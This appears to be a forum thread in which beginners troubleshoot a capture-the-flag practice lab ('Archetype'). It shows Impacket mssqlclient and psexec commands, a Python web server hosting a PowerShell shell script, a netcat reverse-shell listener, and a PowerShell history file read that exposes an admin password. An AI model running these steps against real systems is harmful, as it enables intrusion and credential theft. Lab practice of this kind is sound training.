Starting Point: Foothold

SOLVED: No idea why it worked any different, but I tried it again and I’m good to go. Syntax was the same and I can’t tell you how many times I’ve hand jammed/copy pasted the password in. Oh well.

Supreme noob here,

Trying to get started with Starting Point and I’m already running into issues.

On the very first Starting Point I am trying to use Impacket’s mssqlclient.py on the SQL port on target.

I have the username and password needed to use the script but it’s telling me

kali@kali:~/Downloads/impacket-master/examples$ python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I don’t have too much context on the network but I feel like the issue is far more elementary than that to be getting errors like incorrect domains…

I suspect that it’s because I maybe installed impacket with pip3 instead of pip like the readme told me to do. But I don’t think that would make a difference.

Any tips would be appreciated.

bump

Here’s another thread covering the same topic… a lot of people are having issues with this step… doesn’t make any sense. I’ve not found a solution yet either.

I need help setting up the server
I continue to get this message from the terminal. can anyone tell me why the command is not running. I was under the impression that it will work in the forlder containing the
file shell.ps1

zatoichi@kali:~/Downloads/shell.ps1$ sudo python3 -m http.server 80
[sudo] password for zatoichi:
Traceback (most recent call last):
File “/usr/lib/python3.8/runpy.py”, line 193, in _run_module_as_main
return _run_code(code, main_globals, None,
File “/usr/lib/python3.8/runpy.py”, line 86, in _run_code
exec(code, run_globals)
File “/usr/lib/python3.8/http/server.py”, line 1294, in
test(
File “/usr/lib/python3.8/http/server.py”, line 1249, in test
with ServerClass(addr, HandlerClass) as httpd:
File “/usr/lib/python3.8/socketserver.py”, line 452, in init
self.server_bind()
File “/usr/lib/python3.8/http/server.py”, line 1292, in server_bind
return super().server_bind()
File “/usr/lib/python3.8/http/server.py”, line 138, in server_bind
socketserver.TCPServer.server_bind(self)
File “/usr/lib/python3.8/socketserver.py”, line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
zatoichi@kali:~/Downloads/shell.ps1$

Thank you

Type your comment> @zatoichi79 said:

I need help setting up the server
I continue to get this message from the terminal. can anyone tell me why the command is not running. I was under the impression that it will work in the forlder containing the
file shell.ps1

zatoichi@kali:~/Downloads/shell.ps1$ sudo python3 -m http.server 80
[sudo] password for zatoichi:
Traceback (most recent call last):
File “/usr/lib/python3.8/runpy.py”, line 193, in _run_module_as_main
return _run_code(code, main_globals, None,
File “/usr/lib/python3.8/runpy.py”, line 86, in _run_code
exec(code, run_globals)
File “/usr/lib/python3.8/http/server.py”, line 1294, in
test(
File “/usr/lib/python3.8/http/server.py”, line 1249, in test
with ServerClass(addr, HandlerClass) as httpd:
File “/usr/lib/python3.8/socketserver.py”, line 452, in init
self.server_bind()
File “/usr/lib/python3.8/http/server.py”, line 1292, in server_bind
return super().server_bind()
File “/usr/lib/python3.8/http/server.py”, line 138, in server_bind
socketserver.TCPServer.server_bind(self)
File “/usr/lib/python3.8/socketserver.py”, line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
zatoichi@kali:~/Downloads/shell.ps1$

Thank you

I’m just as new as you are. But I’ve run into this issue as well. Whenever something like this sometimes it’s best to just reset all your connections. Worked for me once I restarted my VPN. Might even try reverting to your VM snapshot.

Take this with a grain of salt.

Thanks. now I am stuck at the last point escalation managed to get all the information but when I am pront with the password I use both password from the shell.ps1 document and I also tried the MAGACORP_4dm1n!! and the Password=M3g4c0rp123 for the ARCHETYPE user and this is what i get

root@kali:/home/zatoichi# nc -lvnp 443
listening on [any] 443 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.27] 49685
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

psexec.py adminstrator@10.10.10.27

zatoichi@kali:~$ sudo su
root@kali:/home/zatoichi# psexec.py adminstrator@10.10.10.27
Impacket v0.9.22.dev1+20200424.150528.c44901d1 - Copyright 2020 SecureAuth Corporation

Password:
[-] Authenticated as Guest. Aborting
[-] Error performing the uninstallation, cleaning up
root@kali:/home/zatoichi#

Do you know how to get the real password? I continue to get the above message

You’re not alone… I’m stuck at this last step too :frowning:

Well guys, i was suffering for this same problem…
After look in the Impacket’s github repo, i found that some examples need the package pyOpenSSL to work properly.
Install the package and all works fine after all.
pip3 install pyOpenSSL

Type your comment> @zatoichi79 said:

I need help setting up the server
I continue to get this message from the terminal. can anyone tell me why the command is not running. I was under the impression that it will work in the forlder containing the
file shell.ps1

zatoichi@kali:~/Downloads/shell.ps1$ sudo python3 -m http.server 80
[sudo] password for zatoichi:
Traceback (most recent call last):
File “/usr/lib/python3.8/runpy.py”, line 193, in _run_module_as_main
return _run_code(code, main_globals, None,
File “/usr/lib/python3.8/runpy.py”, line 86, in _run_code
exec(code, run_globals)
File “/usr/lib/python3.8/http/server.py”, line 1294, in
test(
File “/usr/lib/python3.8/http/server.py”, line 1249, in test
with ServerClass(addr, HandlerClass) as httpd:
File “/usr/lib/python3.8/socketserver.py”, line 452, in init
self.server_bind()
File “/usr/lib/python3.8/http/server.py”, line 1292, in server_bind
return super().server_bind()
File “/usr/lib/python3.8/http/server.py”, line 138, in server_bind
socketserver.TCPServer.server_bind(self)
File “/usr/lib/python3.8/socketserver.py”, line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
zatoichi@kali:~/Downloads/shell.ps1$

Thank you

Hi, do you manage to solve this OSError: [Errno 98] Address already in use? i stuck here too.

I also had the issue with following error when running mssqlclient.py:

[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

Solution for me was to run python3 with sudo.